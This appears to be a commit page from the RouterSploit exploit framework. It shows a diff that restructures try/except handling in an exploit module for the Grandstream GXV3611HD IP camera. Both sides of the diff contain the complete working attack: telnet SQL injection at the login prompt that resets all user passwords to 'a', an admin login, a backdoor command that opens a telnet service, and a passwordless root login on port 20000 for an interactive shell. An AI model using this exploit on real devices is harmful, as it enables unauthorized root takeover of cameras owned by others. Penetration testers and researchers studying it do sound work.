Skip to content

R
routersploit
Commit 311d72d9 by Joshua Abraham
Options

Moved try-catch to check method and removed unnecessary except

parent e949a544
Showing with 38 additions and 39 deletions
routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py
......@@ -30,50 +30,49 @@ class Exploit(exploits.Exploit):
port = exploits.Option(23, 'Target port') # default port
def run(self):
try:
if self.check():
print_success("Target appears to be vulnerable...")
if self.check():
print_success("Target appears to be vulnerable...")
try:
conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") # Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
except:
print_error("Exploit failed. Could not log in.")
try:
conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") # Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
except:
print_error("Exploit failed. Could not log in.")
try:
conn = telnetlib.Telnet(self.target, 20000)
conn.read_until("login: ")
conn.write("root\r\n")
conn.read_until("Password: ")
conn.write("\r\n")
conn.read_until("# ")
print_success("Authenticaiton Successful")
conn.interact()
except:
print_error("Failed to log into backdoor.")
else:
print_error("Exploit failed. Target does not appear vulnerable")
except Exception as err:
print_error("{}".format(err))
try:
conn = telnetlib.Telnet(self.target, 20000)
conn.read_until("login: ")
conn.write("root\r\n")
conn.read_until("Password: ")
conn.write("\r\n")
conn.read_until("# ")
print_success("Authenticaiton Successful")
conn.interact()
except:
print_error("Failed to log into backdoor.")
else:
print_error("Exploit failed. Target does not appear vulnerable")
@mute
def check(self):
conn = telnetlib.Telnet(self.target, self.port)
try:
conn = telnetlib.Telnet(self.target, self.port)
except:
return False
output = conn.read_until("login:")
if 'Grandstream' in output:
return True
else:
return False
return False
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment